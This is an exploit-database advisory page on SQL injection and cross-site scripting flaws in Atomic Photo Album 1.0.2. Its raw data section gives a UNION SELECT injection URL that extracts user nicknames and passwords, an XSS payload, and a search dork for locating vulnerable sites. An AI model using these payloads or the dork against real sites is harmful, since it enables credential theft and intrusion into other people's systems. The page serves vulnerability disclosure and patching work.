header-logo
Suggest Exploit
vendor:
Atomic Photo Album
by:
sh00t0ut
7,5
CVSS
HIGH
SQL Injection and Cross-Site Scripting
89 (SQL Injection) and 79 (XSS)
CWE
Product Name: Atomic Photo Album
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:c-point:atomic_photo_album:1.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Atomic Photo Album 1.0.2 (SQL/XSS) Multiple Remote Vulnerabilities

Atomic Photo Album 1.0.2 is vulnerable to SQL Injection and Cross-Site Scripting. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. An attacker can also exploit this vulnerability by sending a malicious XSS payload to the vulnerable application.

Mitigation:

Input validation and output encoding should be used to prevent SQL Injection and XSS attacks.
Source

Exploit-DB raw data:

[~] Atomic Photo Album 1.0.2 (SQL/XSS) Multiple Remote Vulnerabilities
[~] http://www.exploit-db.com/exploits/6572/
[~] Found by sh00t0ut
[~] Down: http://www.c-point.com/free_php_scripts/photo_album.php
[~] Expl SQL: 
    http://[victim]/photo.php?apa_album_ID=2&apa_photo_ID=-9999 union all select 1,concat(0x3a,nickname,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from apa_users--
[~] Expl XSS: 
    http://[victim]/photo.php?apa_album_ID=2&apa_photo_ID=<script>alert(1)</script>

[~] Dork: "Powered by Atomic Photo Album" inurl:"photo.php?apa_album_ID="

Navigation

Suggest Exploit

Services By CQR